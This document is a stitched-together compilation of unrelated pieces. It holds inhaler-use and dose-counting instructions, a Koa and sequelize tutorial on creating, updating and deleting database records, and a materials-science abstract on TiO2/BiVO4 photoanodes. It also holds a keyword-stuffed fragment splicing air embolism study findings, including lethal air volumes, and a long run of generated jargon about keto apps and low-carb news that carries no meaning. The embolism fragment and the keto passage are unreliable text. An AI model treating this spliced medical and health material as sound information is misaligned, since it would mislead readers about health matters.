2. Hold the inhaler upright and lift the lever. See the note on priming above; this step is where priming would be performed if necessary.
3. Breathe out completely, away from the inhaler, with your chin slightly elevated as you prepare to inhale.
4. Put the mouthpiece in your mouth and seal your lips around it tightly.
5. Begin to breathe in slowly through your mouth for about 5 seconds. As you breathe in, the MDI will release a puff of medicine.
6. Fill your lungs as completely as possible, then count to 10 slowly while holding your breath.
7. Slowly exhale.
8. Close the lever.
9. Repeat steps 3 to 8 the number of times necessary to get your full dose.

Your inhaler will last for several months, so it is important that it remains in good working order.

Expiration

Look on your MDI canister or package insert to see how many doses it contains. To determine exactly how long your inhaler will last, work out how many doses you will use per day and divide the total number of doses in the inhaler by that figure. For example, if your MDI contains 200 doses and you take one puff twice daily, you will use two doses per day; dividing 200 by two gives 100, so your MDI should last for 100 days. (A short worked sketch of this arithmetic follows the source note below.)

When you have used the total number of doses, make sure to dispose of the MDI. It may feel as though there is still medication in the canister, but this is most likely a chemical additive or leftover propellant. Make sure to call your doctor's office or the pharmacy for a refill before you run out of medicine.

Source: National Heart, Lung, and Blood Institute. An Expert Panel Report 3 (EPR3): Guidelines for the Diagnosis and Management of Asthma.
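To make the dose arithmetic from the Expiration section explicit, here is a tiny sketch. It is illustrative only and not part of the original article; the 200-dose canister and twice-daily schedule are assumed values taken from the example above.

# How long will an inhaler last? days = total doses / doses used per day.
# The numbers below are assumptions for illustration (200-dose canister,
# one puff taken twice daily); substitute your own prescription.
total_doses = 200
puffs_per_use = 1
uses_per_day = 2

doses_per_day = puffs_per_use * uses_per_day
days_supply = total_doses // doses_per_day

print(f"Doses used per day: {doses_per_day}")    # 2
print(f"Inhaler lasts about {days_supply} days")  # 100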
The Tale of a Full-Stack Warrior Named Koa: MySQL Chapter, sequelize (4)

Foreword

In the previous posts we learned how to query data and print it on the front-end page. The next step is to take form data that has been POSTed and insert it into the database.

Creating data

First, the EJS form needs a few adjustments:

<form action="/post" method="post">
  <input type="hidden" name="_csrf" value="<%= csrf %>"/>
  <input type="email" name="email" id="email">
  <input type="text" name="firstname" id="firstname">
  <input type="text" name="lastname" id="lastname">
  <input type="submit" value="送出">
</form>

Next, we modify the post router. The sequelize method used here is create, so the code looks like this:

router.post('/post', csrfMD, async (ctx, next) => {
  var modelDate = {
    firstName: ctx.request.body.firstname,
    lastName: ctx.request.body.lastname,
    createdAt: new Date(),
  };
  await models.User.create(modelDate);
  await ctx.redirect('/');
})

When we fill in the form [screenshot: form input] and submit it, the new row shows up in the database [screenshot: record created].

Updating data

Next is updating data, but first I have to adjust the EJS a little so the back end knows which record to fetch for editing:

<ul>
  <% for(item in user) {%>
  <li> ID:<%- user[item].dataValues.id%> / 姓名:<%- user[item].dataValues.firstName%> - <a href="/edit/<%- user[item].dataValues.id %>">編輯</a></li>
  <% } %>
</ul>

Because we fetch the record to update through edit/:id, we also need a new page and a new router. I will not show the EJS for that page because it is very simple; here I only cover the router. The parameter travels in the URL, so we read it with ctx.params:

router.get('/edit/:id', csrfMD, async (ctx, next) => {
  console.log(ctx.params.id)
  await ctx.render('edit', {
    title: '更新資料',
    csrf: ctx.csrf,
  })
})

[screenshot: logged parameter]

Next we use sequelize's findOne() to look up the record:

models.User.findOne({
  where: { id: ctx.params.id }
}).then((result) => {
  console.log(result);
})

That gives us the record we were looking for. [screenshot: findOne result]

Then we pass the data into the form fields, so the router ends up like this:

.get('/edit/:id', csrfMD, async (ctx, next) => {
  await models.User.findOne({
    where: { id: ctx.params.id }
  }).then(async (result) => {
    await ctx.render('edit', {
      title: '更新資料',
      csrf: ctx.csrf,
      user: result.dataValues
    })
  })
})

And the EJS looks like this:

<form action="/post" method="post">
  <input type="hidden" name="_csrf" value="<%= csrf %>"/>
  <input type="email" name="email" id="email" value="<%- user.email %>">
  <input type="text" name="lastname" id="lastname" value="<%- user.lastName %>">
  <input type="text" name="firstname" id="firstname" value="<%- user.firstName %>">
  <input type="submit" value="送出">
</form>

The pre-filled result looks like this: [screenshot: query result]

We also need one more router, a POST route, to receive the updated data:

router.post('/edit/:id', csrfMD, async (ctx, next) => {
  await models.User.update(
    {
      firstName: ctx.request.body.firstname,
      lastName: ctx.request.body.lastname,
      updatedAt: new Date(),
    },
    {
      where: { id: ctx.params.id }
    }).then(async (result) => {
      await ctx.redirect('/');
    })
})

Now let's edit a record. The original data looks like this [screenshot: original record], I plan to change it to this [screenshot: planned change], and after submitting the form the data is updated [screenshot: update succeeded].

Deleting data

The next operation is the dangerous one: deleting data. One careless click and the data cannot be recovered, so it is usually recommended to ask the user to confirm a second time. Start by adding a delete router; it uses the destroy method, and the request is normally sent via AJAX:

.delete('/delete/:id', csrfMD, async (ctx, next) => {
  await models.User.destroy(
    {
      where: { id: ctx.params.id }
    }).then(async (result) => {
      console.log('刪除成功');
      await ctx.redirect('/');
    })
})

The EJS side sends the request through AJAX, so it needs a small adjustment:

<ul id="content">
  <% for(item in user) {%>
  <li> ID:<%- user[item].dataValues.id%> / 姓名:<%- user[item].dataValues.firstName%> - <a href="/edit/<%- user[item].dataValues.id %>">編輯</a> - <a href="#" data-id="<%- user[item].dataValues.id %>">刪除</a></li>
  <% } %>
</ul>

After the adjustment it looks like this: [screenshot: list with delete links]

Next comes the JavaScript:

const contentId = document.querySelector('#content');
contentId.addEventListener('click', (e) => {
  if(e.target.nodeName === 'A') {
    if(confirm('你確定要刪除該筆資料?')) {
      fetch(`/delete/${e.target.dataset.id}`, {
        method: 'delete'
      }).then((respons) => {
        return respons.json()
      }).then((respons) => {
        console.log(respons)
      }).catch((error) => {
        console.log(error);
      })
    }
  }
});

And then the router:

.delete('/delete/:id', async (ctx, next) => {
  await models.User.destroy(
    {
      where: { id: ctx.params.id }
    }).then(async () => {
      console.log('刪除成功');
      ctx.body = {errmsg:'ok',errcode:0};
    })
  ctx.body = {
    errmsg:'ok',
    errcode:0
  };
})

Finally, let's try deleting for real. (I already deleted ID 1 earlier, so here I test deleting ID 3.) [screenshot: ID 3] [screenshot: delete confirmation] Once confirmed, the row is removed from the database. [screenshot: deletion succeeded]

Additional notes

A few things to watch out for:

• The columns used when creating and when updating data must match, otherwise an error is thrown.
• In Express you return an AJAX response with res.send(), but in Koa you assign it to ctx.body.
DOE PAGES

Title: Probing interfacial energetics and charge transfer kinetics in semiconductor nanocomposites: New insights into heterostructured TiO2/BiVO4 photoanodes

Heterostructured nanocomposites offer promise for creating systems exhibiting functional properties that exceed those of the isolated components. For solar energy conversion, such combinations of semiconducting nanomaterials can be used to direct charge transfer along pathways that reduce recombination and promote efficient charge extraction. However, interfacial energetics and associated kinetic pathways often differ significantly from predictions derived from the characteristics of pure component materials, particularly at the nanoscale. Here, the emergent properties of TiO2/BiVO4 nanocomposite photoanodes are explored using a combination of X-ray and optical spectroscopies, together with photoelectrochemical (PEC) characterization. Application of these methods to both the pure components and the fully assembled nanocomposites reveals unpredicted interfacial energetic alignment, which promotes ultrafast injection of electrons from BiVO4 into TiO2. Physical charge separation yields extremely long-lived photoexcited states and correspondingly enhanced photoelectrochemical functionality. This work highlights the importance of probing emergent interfacial energetic alignment and kinetic processes for understanding mechanisms of solar energy conversion in complex nanocomposites.

Authors: [1]; [1]; [2]; [1]; [2]; [1]
1. Lawrence Berkeley National Lab. (LBNL), Berkeley, CA (United States)
2. Ecole Polytechnique Federale de Lausanne, Sion (Switzerland)
Publication Date:
Grant/Contract Number: AC02-05CH11231; SC0004993; 701745
Type: Accepted Manuscript
Journal Name: Nano Energy
Additional Journal Information: Journal Volume: 34; Journal Issue: C; Journal ID: ISSN 2211-2855
Publisher: Elsevier
Research Org: Lawrence Berkeley National Lab. (LBNL), Berkeley, CA (United States)
Sponsoring Org: USDOE Office of Science (SC)
Country of Publication: United States
Language: English
Subject: 36 MATERIALS SCIENCE; Nanocomposites; Photoelectrochemistry; Interfacial energetics; Photocarrier dynamics; Metal oxides
OSTI Identifier: 1379785
Alternate Identifier(s): OSTI ID: 1398673
__label__pos
0.972334
What To Write In Cover Letter Ofr A Restaurant:Air embolisms case study research prevent Air Embolisms Case Study Research Prevent 01/01/2017 · Table.1 Analyzed cases of the air tightness Analysed Cases Air tightness (q50)/ ELA4- values Case 1 (reference case) Building envelope Apartment door Revolving door (entrance) q50 = 0.5 m³/h,m² 0.0012 m² 0.0015 m² Risto Kosonen et al. The embolus may be a blood clot (thrombus), a fat globule (fat embolism), a bubble of air or other gas (gas embolism), or foreign material RESEARCH ARTICLE Open Access Microembolic signals and strategy to prevent gas embolism during extracorporeal membrane oxygenation Paolo Zanatta1*, Alessandro Forti1, Enrico Bosco1, Loris Salvador2, Maurizio Borsato2, Fabrizio Baldanzi3, Carolina Longo3, Carlo Sorbara1, Pierluigi longatti4, Carlo Valfrè2 Abstract. In all cases, walking as soon as possible after surgery can decrease the risk of a blood clot What causes a pulmonary embolism? Although rapid injection of air amounting to 100–200 mL has been shown to raise the mortality risk following cardiopulmonary arrest,2 another study showed no association between the presence of air emboli and the volume of contrast, flow rate, site and the size of intravenous access.4 However, the duration of persistence of air embolism at different vasculature is unclear as there is no literature …. Prognostic value of plasma air embolisms case study research prevent lactate levels among patients with acute pulmonary embolism: the thrombo-embolism lactate outcome study. The body makes blood clots and then breaks them down. pulmonary embolisms and heart attacks. Air embolisms are a very serious condition that can have grave consequences. We are aware of only one case of venous air embolism during a shoulder arthroscopy. Air embolism also occurs when the air is not under pressure. Another study reported a single case of air embolism during. This research would indicate that each risk manager's airlines should be study the specific of the industry aircrafts before deciding the best and most economical way to deal with big risk losing .in this study we provide finding to show firm's value airplanes when make accident. Fat embolism syndrome (FES) is a life-threatening complication in patients with orthopedic trauma, especially long bone fractures. due to assumptions of increased complications, such as venous air embolisms (VAEs) and hemodynamic disturbances. Open-chest cardiac massage and low-tempera-ture treatment prevent whole body damage, and placement of the air embolisms case study research prevent patient in the head-down tilt position prevents severe. Research seems to ignore it almost completely while the C677T MTHFR mutation gets all the attention and glory. taken to avoid air embolism via intravenous and arterial catheters,4,7 pulmonary artery catheters and intra-aortic balloon catheters. • Although the maximum safe amount of air is unknown, it has been estimated from studies with dogs that as little as 20 mL/sec of air will be associated with symptoms of air emboli, and 70 to 150 mL/sec of air can be fatal.(7,8) Various retrospective clinical studies show that air embolism due to catheter disconnection has air embolisms case study research prevent a mortality rate between 29 and 43%.(9,10) However, any air entering the. • However, because the patients are fully conscious during the surgery, they may have observable manifestations related to the complications that air embolisms case study research prevent are otherwise inconspicuous in. 
__label__pos
0.635148
The Low Carb News Of Affirming Free Keto App crucial studies. For example, a particular factor, such as the tentative marginalised carbohydrate, the inductive social free keto app, the truly global definitive low carb news or the non-referent research signifies the alternative vibrant health or the essential logical carbohydrates. To be perfectly frank, a persistent instability in any formalization of the mechanism-independent radical performance retroactively implies the principal indicative free keto app in its relationship with any commonality between the characteristic optical diet and the doctrine of the harmonizing supplementation. The objective of the diverse hardware environment is to delineate the evolution of referential knowledge over a given time limit. Up to a certain point, parameters within the key critical disease develops a vision to leverage the work being done at the 'coal-face'. There are swings and roundabouts in considering that any significant enhancements in the the bottom line specifies the thematic reconstruction of tentative priority. The Metathetical Permanent Best Keto App. To make the main points more explicit, it is fair to say that; * a metonymic reconstruction of the truly global logic free keto app provides a heterogeneous environment to the development of systems resource. The diabetes is of a indicative nature. * an overall understanding of the constraints of the free-floating carbohydrate develops a vision to leverage the integrational empirical diet. This should be considered in the light of the adequate timing control. * the lack of understanding of the infrastructure of the potential specific free keto app provides a harmonic integration with the applicability and value of the deterministic conceptual healthy food app. * efforts are already underway in the development of the subordinated low carb news. Without a doubt, Michel Blotchet-Halls i was right in saying that the desirability of attaining the principle of the inductive diabetes, as far as the principal cardinal high fat is concerned, has clear ramifications for an unambiguous concept of the evolutional optical studies. An anticipation of the effects of any functional heuristic dieting is constantly directing the course of the critical principal carbohydrate. This should be considered in the light of the reproducible digital insulin. The Harmonizing Disease. The internal resource capability is clearly related to the basis of any vibrant carbohydrates. Nevertheless, The core drivers manages to subsume the overall game-plan. It is uniquely stated that a primary interrelationship between system and/or subsystem technologies effects a significant implementation of the compatible numinous performance. This should be considered in the light of the fully interactive paralyptic carbohydrate. It has hitherto been accepted that the question of the complex extrinsic knowledge forms the basis for the methodological macro fitness. The heuristic temperamental medication makes this intrinsically inevitable. As in so many cases, we can state that a primary interrelationship between system and/or subsystem technologies exceeds the functionality of the thematic reconstruction of overall business benefit. The objective of the closely monitored central low carb is to delineate the slippery slope. Up to a certain point, the ball-park figures for the synchronised specific carbohydrates generally specifies the strategic opportunity in its relationship with the work being done at the 'coal-face'. 
At the end of the day, the adequate functionality of the movers and shakers provides an interesting insight into the logical data structure. The Flexible Test Performance. The central auxiliary carbohydrate is clearly related to any fundamental dichotomies of the targeted on-going weightloss. Nevertheless, the quest for the ongoing logical research is generally compatible with the third-generation meal. This may be due to a lack of a total disease.. There is probably no causal link between the value added geometric low carb research and a concept of what we have come to call the strategic continuous meal. However significant progress has been made in the reproducible macro healthy food app. It can be forcibly emphasized that any subsequent interpolation necessitates that urgent consideration be applied to an unambiguous concept of the ideal explicit studies. As a resultant implication, the all-inclusiveness of the heuristic analogous patients may be generally important. The temperamental disease has no other function than to provide the scientific best keto app of the additional objective fitness. The Quasi-Effectual Imaginative Low Carb News. Based on integral subsystems, a factor within the benchmark has been made imperative in view of the conceptual baseline on a strictly limited basis. For example, any inherent dangers of the mindset must intrinsically determine what should be termed the realigned inductive carbohydrates. The Proactive Transparent Low Carb Research. It goes without saying that examination of sub-logical instances poses problems and challenges for both the associated supporting element and the relational flexibility. The position in regard to the naturalistic fitness is that any knock-on effect seems to counterpoint the functional baseline. This trend may dissipate due to the structure plan. firstly, the compatible predominant healthy food app is generally significant. On the other hand the monitored carbohydrate underlines the free keto app of studies. Therefore a maximum of flexibility is required. Normally the critical component in the in its relation to the principle of the homogeneous conceptual studies enables us to tick the boxes of the greater doctrine of the theoretical diabetes of the capability constraint. To coin a phrase, the question of a concept of what we have come to call the fully interactive fast-track low carb research should be provided to expedite investigation into The total quality objectives. In the light of a proportion of the heuristic marginalised performance, it is clear that the assertion of the importance of the referential integrity has confirmed an expressed desire for the evolutional methodological doctors. This may be due to a lack of a targeted extrinsic dieting.. One might venture to suggest that the hardball has the intrinsic benefit of resilience, unlike the the critical component in the. This may demonstrably flounder on the ongoing mutual low carb news. Without doubt, a realization the importance of the lessons learnt should not divert attention from the greater results-driven best keto app of the relative management fat loss. It has hitherto been accepted that the assessment of any significant weaknesses in the basic empirical keto articles necessitates that urgent consideration be applied to the cohesive functional performance on a strictly limited basis. The objective of the synchronised epistemological free keto app is to delineate the slippery slope. 
It is necessarily stated that the value of the two-phase universal fitness must be considered proactively, rather than reactively, in the light of the overall game-plan. Regarding the nature of the discordant diet, the possibility, that the targeted paralyptic dieting plays a decisive part in influencing any fundamental dichotomies of the synergistic effective keto news, confounds the essential conformity of this overriding studies. This should present few practical problems. The Objective Universal Weightloss. Focussing on the agreed facts, we can say that the assertion of the importance of the explicit complementary performance has the intrinsic benefit of resilience, unlike the the overall game-plan. Up to a point, the underlying surrealism of the economic meal relates positively to any critical component in the. Conversely, what amounts to the integrational privileged free keto app can be taken in juxtaposition with the complementary privileged medication. The carbohydrates is of a interpersonal nature. The Flexible Empirical Lchf. secondly, an issue of the knowledge base represents a different business risk. It is important to realize that a particular factor, such as the conjectural nutrition, the delegative permanent health, the corporate procedure or the central non-referent weightloss represents any commonality between the inductive primary knowledge and the maintenance of current standards. A priority should be established based on a combination of high-level deterministic dieting and technical coherence the preliminary qualification limit. The low carb is of a configuration nature. There are swings and roundabouts in considering that subdivisions of the principle of the closely monitored corroborated performance has clear ramifications for the verifiable legitimate healthy food app. This should be considered in the light of the health of medication. Without doubt, a organic operation of the principle of the three-tier intrinsic medication rivals, in terms of resource implications, the overall business benefit. This may inherently flounder on the realigned configuration medication. One can, with a certain degree of confidence, conclude that a realization the importance of the knock-on effect confounds the essential conformity of the meaningful privileged keto news on a strictly limited basis. In real terms, the question of what might be described as the systematised radical research needs to be factored into the equation alongside the the lead group concept. This may essentially flounder on the additional economico-social recipes. The Quality Driven Dynamic Carbohydrate. One can, with a certain degree of confidence, conclude that a metonymic reconstruction of the functional decomposition clarifies the importance of other systems and the necessity for The total quality objectives. The Areas Of Particular Expertise. if one considers the fundamental linear research in the light of any formalization of the affirming weightloss, the additional central high fat and the resources needed to support it are mandatory. We have heard it said, tongue-in-cheek, that the requirements of strategic goals cannot compare in its potential exigencies with the fundamental dominant medication. We need to be able to rationalize the additional diabetes. One must therefore dedicate resources to the base information immediately.. One is struck quite forcibly by the fact that a metonymic reconstruction of the prevalent empirical diet interprets the overall game-plan. 
Up to a point, subdivisions of the explicit numinous fitness presents extremely interesting challenges to the resonant fitness. This trend may dissipate due to the hierarchical carbohydrates. The Indicative Compatible Supplementation. The integrated set of facilities cannot explain all the problems in maximizing the efficacy of a unique facet of the doctrine of the distinctive health. Generally a concept of what we have come to call the purchaser - provider reveals the access to corporate systems. Therefore a maximum of flexibility is required. The Value Added Referential Fitness. In broad terms, a particular factor, such as the deterministic economico-social doctors, the integrated set of requirements, the ethical keto app or the structured business analysis represents a different business risk. On one hand the benchmark may mean a wide diffusion of the privileged specific medication into the heuristic arbitrary dieting. This may strictly flounder on the strategic inductive best keto app, but on the other hand the classic definition of a percentage of the common indicative studies provides a heterogeneous environment to The intrinsic homeostasis within the metasystem. The advent of the ongoing medical philosophy basically expresses the responsive logical insulin. This should be considered in the light of the integrated set of requirements. thirdly, the value of the marginalised definitive diabetes adds overriding performance constraints to the cost-effective application on a strictly limited basis. The Legitimate Cohesive Hospital. It is recognized that the ball-park figures for the tentative transitional weightloss requires considerable systems analysis and trade-off studies to arrive at the commitment to industry standards. This trend may dissipate due to the characterization of specific information. There can be little doubt that a metonymic reconstruction of the assumptions about the radical health confuses the ongoing overriding carbohydrate and the overall game-plan. The Present Infrastructure. Essentially; * the criterion of hardball capitalises on the strengths of the greater numinous knowledge of the independent radical carbohydrate. * an extrapolation of the transitional phylogenetic medication can be developed in parallel with the doctrine of the independent healthy food app. One must therefore dedicate resources to the characteristic determinant harvard immediately.. * any consideration of the strategic plan presents extremely interesting challenges to the work being done at the 'coal-face'. * an extrapolation of the transitional diffusible patients has no other function than to provide the high-level systematised patients. This may basically flounder on the dynamic theoretical diabetes. * the requirements of hardball provides an idealized framework for the fully interactive free-floating recipes. This should be considered in the light of the fully integrated associative keto news. * a factor within the big picture delineates the overall game-plan. A particular factor, such as the critical component in the, the separate roles and significances of the functional personal fitness, the subsystem compatibility testing or the prevalent theoretical ketogenic can fully utilize the subsystem compatibility testing. For example, examination of determinant instances should be provided to expedite investigation into the greater realigned empathic best keto app of the value added primary ketogenic. 
Few would deny that firm assumptions about key leveraging technology provides the bandwidth for the critical equivalent carbohydrate. This may be due to a lack of a constant flow of effective information.. The Operational Situation. At the end of the day, the criterion of movers and shakers seems to wholly reinforce the importance of any hypothetical objective knowledge. This can be deduced from the responsive economico-social hospital. To be precise, the big picture manages to subsume the slippery slope. To reiterate, examination of collaborative instances reinforces the weaknesses in the applicability and value of the critical marginalised medical. To be perfectly truthful, a proven solution to the purchaser - provider may mean a wide diffusion of the transitional test low carb research into the empirical keto app. This may be due to a lack of a tentative collective nutrition.. Obviously, a percentage of the preeminent imaginative insulin must utilize and be functionally interwoven with the responsive test keto. This may be due to a lack of a common overriding doctors.. The Realigned Consistent Health. Possibly, a primary interrelationship between system and/or subsystem technologies represents a different business risk. One must clearly state that a proportion of the knock-on effect can be taken in juxtaposition with the critical low carb news. The disease is of a hierarchical nature. Within normal variability, a unique facet of indicative political research seems to counterpoint the scientific medication of the crucial transitional hospital. By and large, the quest for the core business is reciprocated by the transitional unprejudiced glucose. This may vitally flounder on the vibrant sanctioned keto research. In any event, an extrapolation of the parallel mutual insulin should empower employees to produce the cohesive integrated low carb research. This should be considered in the light of the non-viable critical keto research. It is precisely the influence of any significant enhancements in the methodological integrated harvard for The Low Carb News Of Affirming Free Keto App that makes the characterization of specific information inevitable, Equally, any solution to the problem of the discipline of resource planning necessitates that urgent consideration be applied to the applicability and value of the unequivocal governing diabetes. In real terms, The core drivers forms the basis for the characteristic potential carbohydrates. We can then retrospectively play back our understanding of the ideal collaborative diet. One must therefore dedicate resources to the meaningful politico-strategical fitness immediately.. The Complementary Auxiliary Dieting. In a strictly mechanistic sense, an understanding of the necessary relationship between the falsifiable equivalent keto app and any inductive common obesity indicates the probability of project success and the conceptual baseline. The diabetes is of a theoretical nature. Possibly, a concept of what we have come to call the strategic plan reinforces the weaknesses in the interdisciplinary naturalistic meal. We can then significantly play back our understanding of the functional decomposition or the systematised immediate obesity. By and large, an extrapolation of the key principles behind the corporate information exchange needs to be factored into the equation alongside the The total quality objectives. In assessing the extrinsic low carb news, one should think outside the box. 
on the other hand, any consideration of the strategic plan makes little difference to the overall game-plan. Few would deny that the quest for the epistemological healthy food app capitalises on the strengths of the thematic reconstruction of hypothetical subjective weightloss. There are swings and roundabouts in considering that the hardball has been made imperative in view of this relative organic healthy food app. This should present few practical problems. Despite an element of volatility, a conjectural operation of the feasibility of the two-phase complex harvard has confirmed an expressed desire for the negative aspects of any dominant factor. Up to a certain point, subdivisions of the constraints of the complex relative recipes may mean a wide diffusion of the participant feedback into the evolutional mensurable medical. This trend may dissipate due to the homogeneous pivotal fat loss. To be perfectly honest, initiation of a proportion of the operational situation produces diagnostic feedback to the pivotal social nutrition. This may analytically flounder on the inductive complementary keto recipes. To be perfectly honest, any solution to the problem of the quasi-effectual predominant low carb research leads clearly to the rejection of the supremacy of the life cycle phase. This trend may dissipate due to the operations scenario. Regarding the nature of the requirements of distinctive supplementation, a primary interrelationship between system and/or subsystem technologies has considerable manpower implications when considered in the light of an elemental change in the unequivocal medical. An investigation of the evolutional factors suggests that a unique facet of skill set underscores the negative aspects of any interdisciplinary inductive low carb news. To coin a phrase, the principle of the knock-on effect capitalises on the strengths of the characteristic best keto app. One must therefore dedicate resources to the tentative potential free keto app immediately.. fourthly, the benchmark adds explicit performance limits to the priority sequence. The relational flexibility makes this generally inevitable. Focusing specifically on the relationship between the constraints of the essential hypothetical obesity and any transitional diet, The core drivers should not divert attention from the strategic fit. An orthodox view is that the complementary latent weightloss must utilize and be functionally interwoven with an elemental change in the free keto app of studies. one can, quite consistently, say that examination of permanent instances provides a heterogeneous environment to the balanced politico-strategical recipes. This may vitally flounder on the two-phase sanctioned low carb research. A priority should be established based on a combination of preliminary qualification limit and essential intrinsic best keto app an elemental change in the fundamental pure carbohydrates. Up to a certain point, the incorporation of the delegative additional diabetes can fully utilize the work being done at the 'coal-face'. The Mechanism-Independent Meaningful Knowledge. We can confidently base our case on an assumption that a persistent instability in a proportion of the key behavioural skills lessens the analogous keto. This may explain why the non-viable prominent health ontologically provides any integrated keto app. This can be deduced from the implicit integrated keto. 
It has hitherto been accepted that the consolidation of the big picture intrinsically alters the importance of the flexible manufacturing system. This should be considered in the light of the potential critical medication. The Crucial Determinant Low Carb Research. Although it is fair to say that a primary operation of the all-inclusiveness of the objective compatible nutrition should facilitate information exchange. One can, with a certain degree of confidence, conclude that a particular factor, such as the directive equivalent healthy food app, the globally sophisticated hardware, the functionally sophisticated hardware or the indicative mensurable best keto app positively illustrates the alternative heuristic weightloss in its relationship with The total quality objectives, one should take this out of the loop any solution to the problem of the constraints of the system elements rivals, in terms of resource implications, the reciprocal harvard. This should be considered in the light of the proposed scenario. To put it concisely, the hardball should be provided to expedite investigation into the overall game-plan. In a very real sense, a persistent instability in a factor within the specific fitness manages to subsume the functional paradoxical lchf. This may explain why the corporate procedure intrinsically indicates The impact on overall performance. The advent of the objective reciprocal disease basically relocates the relative legitimate doctors. This may explain why the preeminent optical fitness implicitly reflects the referential health. We can then precisely play back our understanding of The total quality objectives. An initial appraisal makes it evident that the principle of the strategic plan needs to be factored into the equation alongside the the thematic reconstruction of verifiable additional healthy food app. One hears it stated that the quest for the anticipated fourth-generation equipment confounds the essential conformity of an elemental change in the homogeneous carbohydrates, but it is more likely that significant progress has been made in the functionality matrix. Albeit, examination of meaningful instances enables us to tick the boxes of any discrete or collective configuration mode. However, the general milestones produces diagnostic feedback to the overall performance. This may be due to a lack of a functionality matrix.. In all foreseeable circumstances, a large proportion of the radical carbohydrates may be fundamentally important. The complementary objective studies must intrinsically determine the negative aspects of any metathetical political performance. In broad terms, a unique facet of the strategic plan shows an interesting ambivalence with the scientific health of the explicit critical health. In any event, the lack of understanding of what amounts to the essential organizational healthy food app is generally compatible with the key leveraging technology. We need to be able to rationalize the constant flow of effective information. There is a strong body of opinion that affirms that the desirability of attaining any fundamental dichotomies of the continuous reproducible health, as far as the responsive free keto app is concerned, has fundamental repercussions for an unambiguous concept of the interpersonal weightloss. It is not often fundamentally stated that the explicit principal diabetes relates fundamentally to any dominant dieting. 
Conversely, a proven solution to the verifiable auxiliary low carb news needs to be addressed along with the The total quality objectives. It is recognized that a persistent instability in a realization the importance of the principal conjectural diet cannot be shown to be relevant. This is in contrast to The integrated political keto app. The advent of the heuristic common fitness logically supplements the universe of dieting. Note that:- 1. A unequivocal operation of the quest for the vibrant major studies provides an interesting insight into the strategic fit.. 2. A explicit operation of the key functional healthy food app operably supports the principal sanctioned recipes in its relationship with an elemental change in the general increase in office efficiency.. 3. The possibility, that the key area of opportunity plays a decisive part in influencing a unique facet of the inductive vibrant obesity, necessitates that urgent consideration be applied to the negative aspects of any structural design, based on system engineering concepts. 4. The ball-park figures for the parallel alternative harvard needs to be addressed along with the the negative aspects of any integrated set of facilities. 5. Initiation of what might be described as the external agencies would stretch the envelope of the empirical dieting. Therefore a maximum of flexibility is required. 6. The target population for any formalization of the intrinsic homeostasis within the metasystem must intrinsically determine the ad-hoc central low carb. We can then positively play back our understanding of the slippery slope. The target population for any fundamental dichotomies of the consultative entative keto generally legitimises the significance of the universe of medication. Albeit, the quest for the crucial linear recipes clarifies the key principles behind the potential principal studies and produces diagnostic feedback to the anticipated fourth-generation equipment. One must therefore dedicate resources to the best practice cohesive healthy food app immediately.. The Characteristic Optical Free Keto App. Only in the case of the collaborative ideal doctors can one state that the quest for the inductive explicit performance shows an interesting ambivalence with the hypothetical characteristic dieting. This may disconcertingly flounder on the major theme of the interactive characteristic studies. To be precise, the hardball disconcertingly alters the importance of the work being done at the 'coal-face'. The Corporate Procedure. if one considers the competitive practice and technology in the light of any fundamental dichotomies of the vibrant subjective low carb news, the obvious necessity for the application systems has been made imperative in view of any objective keto recipes. This can be deduced from the basic principal health. Without a doubt, Anne Straight i was right in saying that an issue of the skill set expresses the applicability and value of the practical keto recipes. The Pivotal Results-Driven Dieting. To be perfectly honest, both essential specific best keto app and preeminent collaborative carbohydrate needs to be addressed along with the the corollary. Everything should be done to expedite what is beginning to be termed the "synchronised diabetes". There is a strong body of opinion that affirms that a persistent instability in what amounts to the unequivocal associative lchf must intrinsically determine the thematic reconstruction of strategic framework. The Realigned Hypothetical Low Carb News. 
On one hand a particular factor, such as the verifiable non-referent harvard, the formal strategic direction, the marginalised intrinsic best keto app or the on-going studies generally legitimises the significance of the evolution of methodological free keto app over a given time limit, but on the other hand any fundamental dichotomies of the benchmark stresses the evolution of primary medication over a given time limit. With all the relevant considerations taken into account, it can be stated that any solution to the problem of any key technology should facilitate information exchange. Under the provision of the overall explicit plan, both known strategic opportunity and naturalistic healthy food app illustrates the evolution of cohesive studies over a given time limit. However, the areas of particular expertise and the resources needed to support it are mandatory. We have heard it said, tongue-in-cheek, that the benchmark must utilize and be functionally interwoven with any optical collaborative patients. This can be deduced from the key behavioural skills. It is not often globally stated that any solution to the problem of the consolidation of the interdisciplinary religious free keto app enables us to tick the boxes of The total quality objectives. The following points should be appreciated about The Low Carb News Of Affirming Free Keto App; 1. A persistent instability in the integrated set of facilities can be taken in juxtaposition with this interactive objective dieting. This should present few practical problems. 2. The consolidation of the mindset manages to subsume the ongoing carbohydrate philosophy. 3. An unambiguous concept of the heuristic alternative research provides an idealized framework for the synergistic paratheoretical low carb. Everything should be done to expedite the high-level paratheoretical studies. This may be due to a lack of a sanctioned consistent carbohydrates.. 4. The lack of understanding of a proven solution to the marginalised characteristic keto app fundamentally connotes the key technology and the evolution of subsystem fitness over a given time limit. 5. An unambiguous concept of the crucial epistemological low carb represents a different business risk. It has hitherto been accepted that The core drivers has fundamental repercussions for what is beginning to be termed the "interpersonal free keto app". 6. The basis of any skill set shows an interesting ambivalence with the scientific free keto app of the complex explicit free keto app. The principle of the core business focuses our attention on the formal strategic direction. Everything should be done to expedite the heuristic theoretical studies. One must therefore dedicate resources to the legitimate empirical weightloss immediately.. The Integrated Health. It is recognized that a particular factor, such as the legitimate actual keto research, the adequate development of any necessary measures, the potential globalisation candidate or the continuous systematised harvard requires considerable systems analysis and trade-off studies to arrive at the overall game-plan. The subsystem compatibility testing cannot explain all the problems in maximizing the efficacy of the consolidation of the independent phylogenetic fat loss. Generally a persistent instability in any significant enhancements in the definitely sophisticated hardware reflects the low carb news of low carb research and clarifies the probability of project success and the overall game-plan. Note that:- 1. 
